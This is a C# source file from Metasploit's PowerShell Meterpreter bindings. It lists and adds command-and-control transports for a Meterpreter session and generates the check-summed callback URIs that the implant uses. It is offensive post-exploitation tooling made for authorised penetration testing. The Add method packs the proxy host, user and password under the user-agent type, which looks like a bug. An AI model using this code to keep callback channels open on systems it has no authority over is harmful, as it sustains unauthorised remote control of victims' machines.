metasploit-payloads/powershell/MSF.Powershell/Meterpreter/Transport.cs

using System;
using System.Collections.Generic;

namespace MSF.Powershell.Meterpreter
{
    public static class Transport
    {
        public class TransportInstance
        {
            public string Url { get; set; }
            public int CommTimeout { get; set; }
            public int RetryTotal { get; set; }
            public int RetryWait { get; set; }
            public string UserAgent { get; set; }
            public string ProxyHost { get; set; }
            public string ProxyUser { get; set; }
            public string ProxyPass { get; set; }
            public string CertHash { get; set; }
        }

        public class SessionDefinition
        {
            public DateTime SessionExpiry { get; private set; }
            public List<TransportInstance> Transports { get; private set; }

            public SessionDefinition(DateTime sessionExpiry)
            {
                SessionExpiry = sessionExpiry;
                Transports = new List<TransportInstance>();
            }
        }

        public static SessionDefinition List()
        {
            Tlv tlv = new Tlv();

            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.CoreTransportList));

            if (result != null)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] List result returned");
                var responseTlv = Tlv.FromResponse(result);
                if (responseTlv[TlvType.Result].Count > 0 &&
                    (int)responseTlv[TlvType.Result][0] == 0)
                {
                    System.Diagnostics.Debug.Write("[PSH BINDING] List succeeded");
                    var expirySeconds = Tlv.GetValue<int>(responseTlv, TlvType.TransSessExp);
                    var session = new SessionDefinition(DateTime.Now.AddSeconds(expirySeconds));

                    foreach (var transportObj in responseTlv[TlvType.TransGroup])
                    {
                        var transportDict = (Dictionary<TlvType, List<object>>)transportObj;

                        var transport = new TransportInstance
                        {
                            Url = Tlv.GetValue<string>(transportDict, TlvType.TransUrl, string.Empty),
                            CommTimeout = Tlv.GetValue<int>(transportDict, TlvType.TransCommTimeout),
                            RetryTotal = Tlv.GetValue<int>(transportDict, TlvType.TransRetryTotal),
                            RetryWait = Tlv.GetValue<int>(transportDict, TlvType.TransRetryWait),
                            UserAgent = Tlv.GetValue<string>(transportDict, TlvType.TransUa, string.Empty),
                            ProxyHost = Tlv.GetValue<string>(transportDict, TlvType.TransProxyHost, string.Empty),
                            ProxyUser = Tlv.GetValue<string>(transportDict, TlvType.TransProxyUser, string.Empty),
                            ProxyPass = Tlv.GetValue<string>(transportDict, TlvType.TransProxyPass, string.Empty),
                        };
                        var hash = Tlv.GetValue<byte[]>(transportDict, TlvType.TransCertHash);
                        if (hash != null && hash.Length > 0)
                        {
                            transport.CertHash = BitConverter.ToString(hash).Replace("-", "");
                        }

                        session.Transports.Add(transport);
                    }

                    return session;
                }
                System.Diagnostics.Debug.Write("[PSH BINDING] List failed");
            }
            else
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] List result was null");
            }

            return null;
        }

        private static string ToUriString(byte[] b)
        {
            return System.Convert.ToBase64String(b).Replace("+", "-").Replace("/", "_").Replace("=", "");
        }

        private static int GetUnixTime()
        {
            return (int)(DateTime.UtcNow - DateTime.Parse("1/1/1970")).TotalSeconds;
        }

        private static byte[] GenerateRandomBytes(int count)
        {
            var b = new byte[count];
            var c = new System.Security.Cryptography.RNGCryptoServiceProvider();
            c.GetNonZeroBytes(b);
            return b;
        }

        private static string GenerateRandomUri()
        {
            return ToUriString(GenerateRandomBytes(12));
        }

        private static string GenerateUuid()
        {
            var arch = IntPtr.Size == 4 ? 1 : 2;
            var uuid = GenerateRandomBytes(16);
            uuid[10] = (byte)(uuid[8] ^ 1);
            uuid[11] = (byte)(uuid[9] ^ arch);
            var tx = BitConverter.ToInt32(new byte[] { uuid[9], uuid[8], uuid[9], uuid[8] }, 0);
            var t = BitConverter.GetBytes(System.Net.IPAddress.HostToNetworkOrder(tx ^ GetUnixTime()));
            uuid[12] = t[0];
            uuid[13] = t[1];
            uuid[14] = t[2];
            uuid[15] = t[3];
            return ToUriString(uuid);
        }

        private static int Check8(string s)
        {
            var sum = 0;
            foreach (var c in System.Text.Encoding.ASCII.GetBytes(s))
            {
                sum += (int)c;
            }
            return sum % 0x100;
        }

        public static string GenerateTransportUri()
        {
            var uuid = GenerateUuid();
            var sum = 98;

            for (var i = 1; i <= 1000; ++i)
            {
                var t = uuid + GenerateRandomUri();
                if (sum == Check8(t))
                {
                    return string.Format("/{0}/", t);
                }
            }

            return null;
        }

        public static bool Add(TransportInstance transport, int sessionExpiry = 0)
        {
            Tlv tlv = new Tlv();
            tlv.Pack(TlvType.TransUrl, transport.Url);

            if (sessionExpiry > 0)
            {
                tlv.Pack(TlvType.TransSessExp, sessionExpiry);
            }
            if (transport.CommTimeout > 0)
            {
                tlv.Pack(TlvType.TransCommTimeout, transport.CommTimeout);
            }
            if (transport.RetryTotal > 0)
            {
                tlv.Pack(TlvType.TransRetryTotal, transport.RetryTotal);
            }
            if (transport.RetryWait > 0)
            {
                tlv.Pack(TlvType.TransRetryWait, transport.RetryWait);
            }
            if (!string.IsNullOrEmpty(transport.UserAgent))
            {
                tlv.Pack(TlvType.TransUa, transport.UserAgent);
            }
            if (!string.IsNullOrEmpty(transport.ProxyHost))
            {
                tlv.Pack(TlvType.TransUa, transport.ProxyHost);
            }
            if (!string.IsNullOrEmpty(transport.ProxyUser))
            {
                tlv.Pack(TlvType.TransUa, transport.ProxyUser);
            }
            if (!string.IsNullOrEmpty(transport.ProxyPass))
            {
                tlv.Pack(TlvType.TransUa, transport.ProxyPass);
            }
            if (!string.IsNullOrEmpty(transport.CertHash))
            {
                var hash = new byte[transport.CertHash.Length / 2];
                for (var i = 0; i < hash.Length; ++i )
                {
                    hash[i] = Convert.ToByte(transport.CertHash.Substring(i * 2, 2), 16);
                }
                tlv.Pack(TlvType.TransCertHash, hash);
            }

            var result = Core.InvokeMeterpreterBinding(true, tlv.ToRequest(CommandId.CoreTransportAdd));

            if (result != null)
            {
                System.Diagnostics.Debug.Write("[PSH BINDING] List result returned");
                var responseTlv = Tlv.FromResponse(result);
                if (responseTlv[TlvType.Result].Count > 0 &&
                    (int)responseTlv[TlvType.Result][0] == 0)
                {
                    return true;
                }
            }

            return false;
        }
    }
}